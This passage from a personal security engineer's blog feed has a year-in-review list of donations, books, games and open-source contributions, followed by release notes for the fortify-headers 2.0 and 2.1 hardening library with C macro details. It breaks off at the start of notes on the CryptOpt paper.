+<li>$5000 to <a href="https://noyb.eu">NOYB</a></li>
+<li>$5000 to <a href="https://riseup.net">Riseup</a></li>
+<li>$5000 to the <a href="https://archive.org">Internet Archive</a></li>
+<li>$5000 to the <a href="https://en.wikipedia.org/wiki/Planned_Parenthood">Planned Parenthood Federation of America</a></li>
+<li>$1000 to <a href="https://daysforgirls.org">days for girls</a>, on the advice of <a href="https://foreignbystander.com/">chik</a> from <a href="https://darkscience.net">darkscience</a>.</li>
+<li>$200 each, as a <a href="https://opensource.googleblog.com/search/label/peer%20bonus">Open Source Peer Bonus</a>, courtesy of Google, to<ul>
+<li><a href="https://github.com/richfelker/">Rich Felker</a> for their work on <a href="https://musl.libc.org">musl</a>.</li>
+<li><a href="https://mxxn.io/">Blaž Hrastnik</a> for their work on <a href="https://helix-editor.com">Helix</a>.</li>
+<li><a href="https://github.com/justinmk">Justin Keyes</a> for their work on <a href="https://neovim.io">Neovim</a>.</li>
+<li><a href="https://github.com/jeanas">Jean Abou-Samra</a> for their work on <a href="https://pygments.org">Pygments</a>.</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Read a couple of books:<ul>
+<li><a href="https://en.wikipedia.org/wiki/The_Killer_(comics)">Le tueur</a></li>
+<li>Some <a href="https://en.wikipedia.org/wiki/Warhammer_40,000">Warhammer 40,000</a>:<ul>
+<li><a href="https://wh40k.lexicanum.com/wiki/Sons_of_the_Hydra_(Novel)">Sons of the Hydra</a>, neat.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Dark_Imperium_(Anthology)">Dark Imperium (Anthology)</a></li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Shroud_of_Night_(Novel)">Shroud of Night</a>, forgettable.</li>
+<li>The <a href="https://wh40k.lexicanum.com/wiki/Black_Legion_(Novel_Series)">Black Legion</a> duology, solid.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Renegades:_Harrowmaster_(Novel)">Renegades: Harrowmaster</a>, witty.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Assassinorum:_Kingmaker_(Novel)">Assassinorum: Kingmaker</a>, decent.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Night_Lords_(Novel_Series)">Night Lords: The Omnibus</a>, outstanding.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Deacon_of_Wounds_(Novel)">The Deacon of Wounds</a> great writing style.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/Assassinorum:_Execution_Force_(Novel)">Assassinorum: Execution force</a>, forgettable.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Infinite_and_the_Divine_(Novel)">The Infinite and the Divine</a>, highly entertaining.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_End_and_the_Death:_Volume_I_(Novel)">The End and the Death vol. 1</a>, a <em>teensy</em> bit over the top.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_End_and_the_Death:_Volume_II_(Novel)">The End and the Death vol. 2</a>, almost there, almost there, ...</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Macharian_Crusade_(Novel_Series)">The Macharian Crusade Omnibus</a>, a writing style a tad heavy.</li>
+<li>The <a href="https://wh40k.lexicanum.com/wiki/Dark_Imperium_(Novel_Series)">Dark Imperium</a> trilogy, nice to see the setting moving forward!</li>
+<li>The first 5 tomes of the <a href="https://wh40k.lexicanum.com/wiki/Dawn_of_Fire_(Novel_Series)">Dawn of Fire</a> heptalogy, definitely a series of books.</li>
+<li><a href="https://wh40k.lexicanum.com/wiki/The_Lion:_Son_of_the_Forest_(Novel)">The Lion: Son of the Forest</a>, I've seen Dragon Balls episodes with a quicker pace.</li>
+<li>Finished the <a href="https://wh40k.lexicanum.com/wiki/The_Beast_Arises_(Novel_Series)">Beast Arises</a>
+ dodecalogy. The last chapter of the final book deserved a book on its own,
+ instead of being speedrunned in ~30 pages.</li>
+</ul>
+</li>
+<li><a href="https://en.wikipedia.org/wiki/It%27s_OK_to_Be_Angry_About_Capitalism">It's OK to Be Angry About Capitalism</a></li>
+<li><a href="https://nostarch.com/hacks-leaks-and-revelations">Hacks, Leaks, and Revelations</a>: a <a href="https://dustri.org/b/book-review-hacks-leaks-and-revelations.html">reference</a></li>
+<li><a href="https://direct.mit.edu/books/book/3008/Beyond-ChoicesThe-Design-of-Ethical-Gameplay">Beyond choices: The design of ethical gameplay</a></li>
+<li><a href="https://editions-ixe.fr/catalogue/non-le-masculin-ne-lemporte-pas-sur-le-feminin-ned/">Non, le masculin ne l’emporte pas sur le féminin !</a></li>
+<li><a href="https://en.wikipedia.org/wiki/This_Changes_Everything_(book)">This Changes Everything: Capitalism vs. the Climate</a></li>
+<li><a href="https://www.goodreads.com/en/book/show/51176626">Break 'em Up: Recovering Our Freedom from Big Ag, Big Tech, and Big Money</a>.</li>
+<li><a href="https://aosabook.org/en/buy.html">The Performance of Open Source Applications</a>: contains some really nice tidbits.</li>
+<li><a href="https://aosabook.org/en/">The Architecture of Open Source Applications, Part 1.</a>: computers were a mistake.</li>
+<li><a href="https://nostarch.com/kill-it-fire">Kill It with Fire: Manage Aging Computer Systems (and Future Proof Modern Ones)</a></li>
+<li><a href="https://goodreads.com/book/show/38212110-technically-wrong">Technically Wrong: Sexist Apps, Biased Algorithms, and Other Threats of Toxic Tech</a></li>
+<li><a href="https://nostarch.com/locksport">Locksport - A Hacker’s Guide to Lockpicking, Impressioning, and Safe Cracking</a>: <a href="https://dustri.org/b/book-review-locksport-a-hackers-guide-to-lockpicking-impressioning-and-safe-cracking.html">great</a></li>
+<li><a href="https://freakyclown.com/publications">How I Rob Banks (and other such places)</a>, written in an unbearably cocky style, mildly entertaining.</li>
+<li><a href="https://samleecole.com">How Sex Changed the Internet and the Internet Changed Sex: An Unexpected History</a>, a bit too shallow for my taste.</li>
+<li><a href="https://toddrose.com/endofaverage">The End of Average</a>, great book, except the part where the author argues that the goal of schools is to prepare kids for jobs.</li>
+<li><a href="https://staffeng.com/book">Staff Engineer: Leadership beyond the management track</a>, I'm not there yet, but it helped me understand some coworker's jobs and struggles.</li>
+<li><a href="https://thirdeditions.com/en/sagas/94-metal-gear-solid-hideo-kojima-s-magnum-opus-9791094723616.html">Metal Gear Solid. Hideo Kojima's Magnum Opus</a>:
+ deluge of superlatives directed at Kojima, speculative opinionated wild rambling, no mention of the <a href="https://en.wikipedia.org/wiki/Quiet_(Metal_Gear)">rampant</a>
+ <a href="https://theguardian.com/technology/2014/apr/09/metal-gear-solid-ground-zeroes-sexual-violence">sexism</a>,
+ typos and frenchisms, … prefer the <a href="https://en.wikipedia.org/wiki/Metal_Gear">wikipedia</a> and <a href="https://metalgear.fandom.com/wiki/Metal_Gear_Wiki">fandom</a> pages instead.</li>
+<li><a href="https://en.wikipedia.org/wiki/The_Mirage_(Ruff_novel)">The Mirage</a>: I
+ was expecting more of a description of an alternative history than a
+ novel with a lame plot and forgettable characters. The humour is goofy
+ and unsubtle: a punk rock group called Green Desert has an anti-war
+ anthem named "Arabian Idiot"; a morning talk show called Jazeera &
+ Friends, … but this is completely on par with the post-11-September
+ anti-muslim/Iraqi rhetoric, making it both funny and perfectly adequate.</li>
+</ul>
+</li>
+<li>Moved back to France.</li>
+<li>Volunteered at a library.</li>
+<li>Refused to sell <a href="https://websec.fr">websec.fr</a></li>
+<li>Listened to <a href="https://listenbrainz.org/user/jvoisin/year-in-music/">some music</a>.</li>
+<li>Attended some concerts:<ul>
+<li><a href="https://en.wikipedia.org/wiki/Eisbrecher">Eisbrecher</a>, along with <a href="https://maerzfeld.de">Maerzfeld</a></li>
+<li><a href="https://gojira-music.com">Gojira</a>, along with <a href="https://alienweaponry.com">Alien Weaponry</a></li>
+<li><a href="https://katatonia.com">Katatonia</a>, along with
+ <a href="https://som.band">SOM</a> and <a href="https://solstafir.net">Sólstafir</a></li>
+<li><a href="https://heavenshallburn.com">Heaven Shall Burn</a>, along with
+ <a href="https://trivium.org">Trivium</a>,
+ <a href="https://en.wikipedia.org/wiki/Malevolence_(band)">Malevolence</a>, and
+ <a href="https://obituary.cc">Obituary</a></li>
+<li><a href="https://igorrr.com">Igorrr</a>, along with
+ <a href="https://derwegeinerfreiheit.de">Der Weg einer Freiheit</a>,
+ <a href="https://en.wikipedia.org/wiki/Amenra">Amenra</a>, and
+ <a href="http://hangmanschair.com">Hangman's Chair</a></li>
+</ul>
+</li>
+<li>Played some video games:<ul>
+<li>On a computer:<ul>
+<li><a href="https://www.doomworld.com/forum/topic/134292-myhousewad/">MyHouse.WAD</a>: <a href="https://doomwiki.org/wiki/My_House">wow</a>.</li>
+<li><a href="https://en.wikipedia.org/wiki/Observer_(video_game)">>observer_</a>: didn't like it.</li>
+<li><a href="https://en.wikipedia.org/wiki/Sea_of_Thieves">Sea of Thieves</a>, ~ok with friends.</li>
+<li><a href="https://hyperstrange.com/our-games/blood-west/">Blood West</a>: <a href="https://en.wikipedia.org/wiki/Thief_(series)">Thief</a> in the Far West.</li>
+<li><a href="https://en.wikipedia.org/wiki/Half-Life%3A_Alyx">Half Life: Alyx</a>: impressive in every way.</li>
+<li><a href="https://en.wikipedia.org/wiki/High_on_Life_(video_game)">High on Life</a>: excruciatingly tedious at best.</li>
+<li><a href="https://en.wikipedia.org/wiki/Cyberpunk_2077#Cyberpunk_2077:_Phantom_Liberty">Cyberpunk 2077: Phantom Liberty</a>: glorious.</li>
+<li><a href="https://en.wikipedia.org/wiki/Tom_Clancy's_Rainbow_Six_Siege">Rainbow Six: Siege</a>: better than <a href="https://en.wikipedia.org/wiki/Counter-Strike">Counter Strike</a>.</li>
+<li><a href="https://en.wikipedia.org/wiki/Hogwarts_Legacy">Hogwarts Legacy</a>: breathtaking and well rounded.</li>
+<li><a href="https://store.steampowered.com/app/2329130/Rewind_Or_Die/">Rewind or Die</a> felt like playing resident evil again <3</li>
+<li><a href="https://en.wikipedia.org/wiki/Outer_Wilds">Outer Wilds</a>: the controls were too terrible for me to play.</li>
+<li><a href="https://en.wikipedia.org/wiki/The_Last_of_Us_Part_I">The Last of Us Part 1</a>: ok-ish, not my jam, Joel is a moron.</li>
+<li><a href="https://en.wikipedia.org/wiki/The_Witcher_3%3A_Wild_Hunt">The Witcher 3 - Wild Hunt</a>: when did video games get so long…</li>
+<li><a href="https://en.wikipedia.org/wiki/Apex_Legends">Apex Legends</a>: a lame version of <a href="https://en.wikipedia.org/wiki/Titanfall_2">Titanfall 2</a>, ok-ish when playing ranked.</li>
+<li><a href="https://en.wikipedia.org/wiki/Warhammer_40,000:_Chaos_Gate_-_Daemonhunters">Warhammer 40,000: Chaos Gate - Daemonhunters</a>:
+ <a href="https://en.wikipedia.org/wiki/XCOM">XCOM</a> with <a href="https://wh40k.lexicanum.com/wiki/Grey_Knights">Grey knights</a>.</li>
+<li><a href="https://en.wikipedia.org/wiki/Metal%3A_Hellsinger">Metal: Hellsinger</a>: looked super-lame on gameplay videos, but was surprisingly fun.</li>
+<li><a href="https://en.wikipedia.org/wiki/Starfield_(video_game)">Starfield</a>: a buggy clunky quickly-boring
+ <a href="https://en.wikipedia.org/wiki/The_Elder_Scrolls_V:_Skyrim">Skyrim</a> in space, quickly went back to Cyberpunk 2077.</li>
+<li><a href="https://store.steampowered.com/app/1172650/INDUSTRIA/">Industria</a>: catastrophic performances for looking utterly terrible, along with a clunky feeling, promptly uninstalled.</li>
+<li><a href="https://en.wikipedia.org/wiki/Journey_to_the_Savage_Planet">Journey to the Savage Planet</a>: Rich in poop-oriented
+ jokes, trying hard to be funny and maybe even subversive but systematically falling flat.</li>
+<li><a href="https://en.wikipedia.org/wiki/Baldur%27s_Gate_3">Baldur's Gate 3</a>: not a
+ fan of the <a href="https://en.wikipedia.org/wiki/Dungeons_%26_Dragons">Dungeons & Dragons</a> dice-based
+ gameplay, nor of the hard dialog choices cutting entire parts of the game,
+ but still an amazing game.</li>
+<li><a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain">Metal Gear Solid V: The Definitive Experience</a>,
+ so <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_Ground_Zeroes">Metal Gear Solid V: Ground Zeroes</a> and
+ <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain">Metal Gear Solid V: The Phantom Pain</a>.
+ I bought it after having seen the former being run at the <a href="https://gamesdonequick.com/tracker/run/5506">AGDQ 2023</a>.
+ Truly amazing game overall, except for the <a href="https://en.wikipedia.org/wiki/Metal_Gear_Solid_V:_The_Phantom_Pain#Portrayal_of_Quiet">sexualisation of the <em>sole</em> female character</a>.</li>
+</ul>
+</li>
+<li>On a (glorious) <a href="https://en.wikipedia.org/wiki/Steam_Deck">Steam Deck</a>:<ul>
+<li><a href="https://store.steampowered.com/app/638990/UNDYING/">UNDYING</a>: nice
+ zombie-related game.</li>
+<li><a href="https://store.steampowered.com/agecheck/app/1593500/">God of War</a>,
+ surprisingly "wholesome".</li>
+<li><a href="https://blacksaltgames.com/">Dredge</a>, terrific indie game: gorgeous looking, simple yet gripping gameplay, interesting lore and story, …</li>
+<li><a href="https://en.wikipedia.org/wiki/Vampyr_(video_game)">Vampyr</a>, because
+ I miss <a href="https://en.wikipedia.org/wiki/Vampire:_The_Masquerade_%E2%80%93_Bloodlines">Vampire: The Masquerade – Bloodlines</a>. It could have been so much more instead of being "meh".</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>Ported <a href="https://github.com/jvoisin/snuffleupagus">Snuffleupagus</a> to PHP8.3.</li>
+<li>Contributed to a couple of software:<ul>
+<li><a href="https://github.com/lite-xl/lite-xl/pulls?q=is%3Apr+author%3Ajvoisin">lite-xl</a></li>
+<li><a href="https://alpinelinux.org/">Alpine linux</a>, by:<ul>
+<li>becoming a <a href="https://pkgs.alpinelinux.org/packages?branch=edge&repo=&arch=&maintainer=Julien%20Voisin">package maintainer</a></li>
+<li><a href="https://gitlab.alpinelinux.org/alpine/tsc/-/issues/64">documenting a bit</a> the compiler-based mitigations,
+ and <a href="https://gitlab.alpinelinux.org/alpine/abuild/-/merge_requests/221">enabling some missing ones</a>.</li>
+</ul>
+</li>
+<li>Because of <a href="https://runzero.com">runZero</a>, I<ul>
+<li><a href="https://github.com/rapid7/recog/pulls?q=+is%3Apr+author%3Ajvoisin">contributed to recog</a> to improve some of its fingerprints;</li>
+<li><a href="https://github.com/Sonarr/Sonarr/issues/5601">made it less trivial</a> to detect Sonarr/Lidarr/Radarr/… versions.</li>
+</ul>
+</li>
+<li><a href="https://github.com/struct/isoalloc/pulls?q=is%3Apr+author%3Ajvoisin+created%3A2023">isoalloc</a></li>
+<li><a href="https://github.com/pygments/pygments/commits?author=jvoisin">pygments</a>, mainly by adding lexers.</li>
+<li><a href="https://github.com/morpheus65535/bazarr/pull/2304">bazarr</a>, making it work on Alpine Linux.</li>
+<li><a href="https://github.com/google/oss-fuzz/pulls?q=is%3Apr+author%3Ajvoisin">oss-fuzz</a>,
+ including some <a href="https://github.com/guidovranken/python-library-fuzzers/pulls?q=is%3Apr+author%3Ajvoisin">python fuzzers</a>.</li>
+<li><a href="https://github.com/daanx/mimalloc-bench">mimalloc-bench</a>,
+ resulting in some <a href="https://github.com/microsoft/snmalloc/pull/587#issuecomment-1442077886">real world improvements</a>.</li>
+<li><a href="https://github.com/quodlibet/mutagen/pulls/jvoisin">mutagen</a>, since it's
+ used by <a href="https://0xacab.org/jvoisin/mat2">mat2</a>. I even <a href="https://github.com/google/oss-fuzz/pull/10072">integrated it into
+ OSS-Fuzz</a>.</li>
+<li><a href="https://github.com/rapid7/metasploit-framework/pulls?q=is%3Apr+jvoisin">metasploit</a>,
+by doing a lot of code reviews for pull-requests, and landing some modules,
+ like a <a href="https://github.com/rapid7/metasploit-framework/pull/17711">SPIP RCE</a>,
+ courtesy of <a href="https://thinkloveshare.com/">Laluka</a> and <a href="https://twitter.com/coiffeur0x90">coiffeur</a>.</li>
+<li><a href="https://chrony.tuxfamily.org/">chrony</a>, spending some time debugging
+ <a href="https://mail-archive.com/chrony-dev@chrony.tuxfamily.org/msg02572.html">how to enable its seccomp sandbox</a>
+ on Alpine Linux, resulting in a <a href="https://gitlab.alpinelinux.org/alpine/aports/-/issues/14891#note_316587">couple of improvements</a>,
+ and of course a <a href="https://gitlab.alpinelinux.org/alpine/aports/-/merge_requests/47087">now-enabled-by-default sandbox</a> there.</li>
+</ul>
+</li>
+<li>Got a CVE for a bug I <a href="https://github.com/py-pdf/pypdf/security/advisories/GHSA-jrm6-h9cq-8gqw">reported</a> in 2020!</li>
+<li>Kept maintaining <a href="https://openmw.org">OpenMW</a>'s infrastructure.</li>
+<li>Learnt some <a href="https://en.wikipedia.org/wiki/Rust_(programming_language)">Rust</a> so I could hang out with the cool kids.</li>
+<li>Helped organise the <a href="http://g.co/ctf">GoogleCTF</a>, which was <a href="https://ctftime.org/event/1929">pretty well received</a>.</li>
+<li>Added more possible subtitles to this blog, bringing their numbers above 1100.</li>
+<li>Reduced the size of this website's webpages; most should now be around 10kb.</li>
+<li>Contributed a bit to Wikipedia, in <a href="https://en.wikipedia.org/wiki/Special:Contributions/jvoisin">English</a> and in <a href="https://fr.wikipedia.org/wiki/Sp%C3%A9cial:Contributions/jvoisin">French</a>
+ under my usual nickname.</li>
+<li>Moved my emails away from <a href="https://gandi.net">Gandi</a> over to <a href="https://migadu.com">Migadu</a>,
+ given their <a href="https://chatting.neocities.org/posts/2023-gandi-pricing">ludicrous</a> post-acquisition price increase.</li>
+<li><a href="https://github.com/jvoisin/compiler-flags-distro">Investigated</a> what
+ hardening-related compiler flags were enabled by default by popular Linux
+ distributions.</li>
+<li><a href="https://tests.stockfishchess.org/users#jvoisin">Contributed a bit</a> (by crunching numbers) to <a href="https://stockfishchess.org/">Stockfish</a>,
+ an open-source chess engine with an <a href="https://en.wikipedia.org/wiki/Elo_rating_system">Elo rating</a>
+ around <a href="https://computerchess.org.uk/ccrl/4040/rating_list_all.html">3500</a>.</li>
+<li>Got featured a couple of times on Hacker News/reddit/lobste.rs/… frontpage,
+ thanks to a <s><a href="https://www.reddit.com/r/karma/wiki/index/faq/">karma</a> junkie</s>
+ marketing-able <a href="https://dijit.sh">friend</a></li>
+<li>Kept maintaining <a href="https://nos-oignons.net/">Nos Oignons</a>'s infrastructure with <a href="https://corl3ss.com/">corl3ss</a>.
+ We're back at handling <a href="https://nos-oignons.net/Services/index.en.html">around 2%</a>
+ of tor's exit traffic! Our little non-profit is now 10 years old.</li>
+<li><a href="https://github.com/jvoisin/fortify-headers">Took over</a> the development and maintenance of
+ <a href="https://u.2f30.org/sin/">sin</a>'s <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>.
+ It's used by <a href="https://openwrt.org/">OpenWrt</a>, <a href="https://www.alpinelinux.org/">Alpine Linux</a>,
+ and <a href="https://bugs.gentoo.org/546692">soon</a> in <a href="https://wiki.gentoo.org/wiki/Project:Musl">Gentoo Hardened's musl flavour</a>.</li>
+<li>Ported my resume/cover letter template from
+ <a href="https://latex-project.org">LaTeX</a> to
+ <a href="https://typst.app/docs/guides/guide-for-latex-users/">typst</a> and felt so
+ much joy purging away all the LaTeX/TeXLive/XeTeX/LuaTeX/… garbage from my computer,
+ to never have to touch it again.</li>
+<li>Got a "Documented Feedback from Employee Relations" from HR at work for
+ saying "Awkward to have yet another middle aged rich white het guy come talk
+ about diversity and inclusion." on an internal chatroom, about <a href="https://booleanblackbelt.com/who-is-the-boolean-black-belt/">this middle
+ aged rich white het guy</a>
+ invited to give an internal talk about diversity and inclusion.</li>
+</ul>fortify-headers 2.12023-12-16T20:30:00+01:002023-12-16T20:30:00+01:00jvoisintag:dustri.org,2023-12-16:/b/fortify-headers-21.html<p>Only 4 days after the <a href="https://dustri.org/b/fortify-headers-20.html">release</a> of
+<a href="https://github.com/jvoisin/fortify-headers">fortify-headers</a>,
+here is the <a href="https://github.com/jvoisin/fortify-headers/releases/tag/2.1">2.1</a>,
+fixing a couple of portability issues and tidying a bit the code.
+<a href="https://chimera-linux.org/">Chimera Linux</a> users are
+<a href="https://github.com/chimera-linux/cports/commit/a26be649d8a13c1012d5e165055d354a6bab1af8">as of today</a>
+<del>test driving</del> benefiting from it.</p>
+<h2>Changelog</h2>
+<ul>
+<li>Remove superfluous includes from the headers</li>
+<li>Put some functions in to their …</li></ul><p>Only 4 days after the <a href="https://dustri.org/b/fortify-headers-20.html">release</a> of
+<a href="https://github.com/jvoisin/fortify-headers">fortify-headers</a>,
+here is the <a href="https://github.com/jvoisin/fortify-headers/releases/tag/2.1">2.1</a>,
+fixing a couple of portability issues and tidying a bit the code.
+<a href="https://chimera-linux.org/">Chimera Linux</a> users are
+<a href="https://github.com/chimera-linux/cports/commit/a26be649d8a13c1012d5e165055d354a6bab1af8">as of today</a>
+<del>test driving</del> benefiting from it.</p>
+<h2>Changelog</h2>
+<ul>
+<li>Remove superfluous includes from the headers</li>
+<li>Put some functions in to their proper files</li>
+<li>Add a missing include in <code>sys/select.h</code></li>
+<li>Do not use static inline for C++ to avoid <a href="https://en.wikipedia.org/wiki/One_Definition_Rule">ODR</a>-wise violation</li>
+<li>Guard some conditional stdio APIs with the right macros</li>
+<li>Fix a typo that would prevent C++ code from compiling correctly</li>
+<li>Rename macros to be more namespace-friendly</li>
+</ul>
+<h2>Implementation details</h2>
+<p>Including parts from the
+<a href="https://en.wikipedia.org/wiki/Standard_library">stdlib</a> in fortify means that
+programs that don't correctly include everything they need might compile, even
+though they shouldn't. Fortunately, the only bits used are either:</p>
+<ul>
+<li><code>size_t</code>, which can be obtained by using <code>typeof(sizeof(char))</code>,
+ since it's by definition the type returned by <code>sizeof</code>.</li>
+<li>constants like <code>PATH_MAX</code> (that we can define to <code>4096</code>), <code>MB_LEN_MAX</code>
+ (defined as 16), ...</li>
+<li>eldritch constructs like <a href="https://www.man7.org/linux/man-pages/man3/MB_CUR_MAX.3.html"><code>MB_CUR_MAX</code></a>,
+ whose usage we hide behind an <code>#ifdef</code>.</li>
+</ul>
+<p>The other big thing is the one caught by <a href="https://github.com/ssbr">Devin Jeanpierre</a>, the usage of <code>static
+inline</code> while <a href="https://en.cppreference.com/w/c/language/inline">absolutely alright in C</a>,
+is problematic in C++, because of the <a href="https://en.wikipedia.org/wiki/One_Definition_Rule">One Definition Rule</a>:
+In C++, if a function is declared inline, it must be declared inline in every translation unit, and also every
+definition of an inline function must be exactly the same (while in C they may
+be different.) On the other hand, C++ allows non-const function-local
+statics and all function-local statics from different definitions of an inline
+function are the same in C++, but distinct in C.
+More practically, calling <code>FORTIFY_INLINE</code> functions from an inline function in C++, and including
+the header defining that inline function in more than one <a href="https://en.wikipedia.org/wiki/Translation_unit_%28programming%29">translation
+unit</a> results
+in undefined behaviour. The fix is easy, and was
+<a href="https://github.com/jvoisin/fortify-headers/commit/c607773a80e6685ab4c922245c33cf2ea5dcfb72">committed</a>
+by <a href="https://github.com/q66">q66</a>: use <code>static</code> instead of <code>static inline</code> in C++.</p>
+<p>Thanks <a href="https://github.com/ssbr">Devin Jeanpierre</a> for spending time to look at
+C++ compatibility, <a href="https://github.com/q66">q66</a> for his patches, willingness to ship
+fortify-headers in Chimera, and becoming co-maintainer.</p>fortify-headers 2.02023-12-12T23:30:00+01:002023-12-12T23:30:00+01:00jvoisintag:dustri.org,2023-12-12:/b/fortify-headers-20.html<p>8 months ago, I started to contribute to <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>,
+a standalone <a href="https://gcc.gnu.org/legacy-ml/gcc-patches/2004-09/msg02055.html">fortify-source</a> implementation,
+with the goal of implementing <code>FORTIFY_SOURCE=3</code>, since the current version
+only implemented <code>FORTIFY_SOURCE=2</code>. I reached out to
+<a href="https://u.2f30.org/sin/">sin</a>, the original maintainer, to ask if he was
+interested in my changes, and he told me the …</p><p>8 months ago, I started to contribute to <a href="https://git.2f30.org/fortify-headers/">fortify-headers</a>,
+a standalone <a href="https://gcc.gnu.org/legacy-ml/gcc-patches/2004-09/msg02055.html">fortify-source</a> implementation,
+with the goal of implementing <code>FORTIFY_SOURCE=3</code>, since the current version
+only implemented <code>FORTIFY_SOURCE=2</code>. I reached out to
+<a href="https://u.2f30.org/sin/">sin</a>, the original maintainer, to ask if he was
+interested in my changes, and he told me the project wasn't maintained
+anymore. But he would be happy to give me the commit bit instead. I spent
+some months <a href="https://github.com/jvoisin/fortify-headers">writing code</a> before
+accepting, to see if it would be a good idea: Would I be able to maintain it?
+To improve it? Add more features? and so on. Turns out the answer is yes, and
+I'm thus happy to announce the immediate availability of <a href="https://git.2f30.org/fortify-headers/refs.html">fortify-headers
+2.0</a>!</p>
+<h2>Changelog</h2>
+<ul>
+<li>Added clang support, based on <a href="https://github.com/q66">q66</a>'s patches.</li>
+<li>Fixed a 64b-related incompatibility around <code>ppoll</code> </li>
+<li>Added a ton of tests, with <a href="https://jvoisin.github.io/fortify-headers/">around 90% of coverage</a></li>
+<li>Made use of <code>__builtin_dynamic_object_size</code> when <code>FORTIFY_SOURCE=3</code> is used,
+ instead of <code>__builtin_object_size</code>.</li>
+<li>Made use of <a href="https://clang.llvm.org/docs/AttributeReference.html">attributes</a>:
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#alloc-size">alloc_size</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#diagnose-as-builtin">diagnose_as_builtin</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#diagnose-if">diagnose_if</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#format">format</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#malloc">malloc</a>,
+ <a href="https://clang.llvm.org/docs/AttributeReference.html#nodiscard-warn-unused-result">warn_unused_result</a>,
+ …</li>
+<li>Added some missing functions, like <code>calloc</code>, <code>fdopen</code>, <code>fmemopen</code>, <code>fprintf</code>,
+ <code>malloc</code>, <code>memchr</code>, <code>popen</code>, <code>printf</code>, <code>qsort</code>, <code>umask</code>, …</li>
+<li>Added continuous integration, both on clang and gcc, covering the whole range
+ of supported versions across the latest Ubuntu LTS.</li>
+</ul>
+<h2>Implementation details</h2>
+<p>Since this is a pretty uncommon piece of software, friends of mine have been
+asking me details about the involved black magic.
+While it's possible to overload functions with the
+<a href="https://clang.llvm.org/docs/AttributeReference.html#overloadable">overloadable</a>
+attribute in C, there isn't really something similar for drive-by overloading.
+Fortunately, it's possible to hack an equivalent by combining
+<a href="https://gcc.gnu.org/onlinedocs/cpp/Wrapper-Headers.html"><code>#include_next</code></a> with
+the following macros:</p>
+<div class="codehilite"><pre><span></span><code><span class="cp">#define _FORTIFY_STR(s) #s</span>
+<span class="cp">#define _FORTIFY_ORIG(p, fn) __typeof__(fn) __orig_##fn __asm__(_FORTIFY_STR(p) #fn)</span>
+<span class="cp">#define _FORTIFY_FNB(fn) _FORTIFY_ORIG(__USER_LABEL_PREFIX__, fn)</span>
+<span class="cp">#define _FORTIFY_FN(fn) _FORTIFY_FNB(fn); _FORTIFY_INLINE</span>
+</code></pre></div>
+
+<p>This makes the original function available when prefixed with <code>__orig</code>,
+while allowing overloading.
+On clang, the <a href="https://clang.llvm.org/docs/AttributeReference.html#pass-object-size-pass-dynamic-object-size"><code>pass_object_size</code>/<code>pass_dynamic_object_size</code></a>
+attribute is used to pass down arguments size; the assembly label preventing
+weird <a href="https://en.wikipedia.org/wiki/Name_mangling">mangling</a> issues. Since
+it's only a label, despite being assembly, it's still portable across various
+architectures. The <code>_FORTIFY_INLINE</code> macro contains as many "please inline this
+function" directives as possible, to avoid polluting the symbols.</p>
+<p>There is of course a ton of <code>#ifdef</code>/<code>#if __has_attribute</code>/… to work around various
+compiler intrinsics, like clang missing <code>__builtin_va_arg_pack</code> or gcc missing
+<code>diagnose_if</code>, so that fortify-headers will always make use of the most
+features available.</p>
+<p>It is indeed a particularly gross pile of hacks,
+but this is C, also known as "nice things and why we can't have them."</p>
+<p>Thanks to <a href="https://u.2f30.org/sin/">sin</a> for creating the project and
+maintaining it for years, <a href="https://daniel.micay.dev">strcat</a> for his inspiring
+work on fortifying <a href="https://en.wikipedia.org/wiki/Bionic_(software)">bionic</a>,
+<a href="https://github.com/q66">q66</a> for his clang patches and general support,
+the friendly people from <a href="https://2f30.org">2f30</a> for their patience,
+<a href="http://serge.liyun.free.fr/serge/">Serge Sans Paille</a> for his <a href="https://github.com/serge-sans-paille/fortify-test-suite">testsuite</a>,
+<a href="https://people.freebsd.org/~kevans/">kevans</a> for his work on fortifying
+<a href="https://reviews.freebsd.org/D32306">FreeBSD's libc</a>,
+Red Hat for pushing <code>FORTIFY_SOURCE=2</code> and <code>FORTIFY_SOURCE=3</code> forward,
+...</p>Paper notes: CryptOpt2023-12-01T12:30:00+01:002023-12-01T12:30:00+01:00jvoisintag:dustri.org,2023-12-01:/b/paper-notes-cryptopt.html<ul>
+<li>Full title: CryptOpt: Verified Compilation with Randomized Program Search for Cryptographic Primitives</li>
+<li>PDF: <a href="https://arxiv.org/abs/2211.10665">arXiv</a> (<a href="https://dustri.org/b/files/papers/cryptopt.pdf">local mirror</a>)</li>
+<li>Authors: Joel Kuepper, Andres Erbsen, Jason Gross, Owen Conoly, Chuyue Sun, Samuel Tian, David Wu, Adam Chlipala, Chitchanok Chuengsatiansup, Daniel Genkin, Markus Wagner, Yuval Yarom</li>
+</ul>
+<p>Cryptography is hard, high-performance one even more so: formal …</p><ul>
+<li>Full title: CryptOpt: Verified Compilation with Randomized Program Search for Cryptographic Primitives</li>
+<li>PDF: <a href="https://arxiv.org/abs/2211.10665">arXiv</a> (<a href="https://dustri.org/b/files/papers/cryptopt.pdf">local mirror</a>)</li>
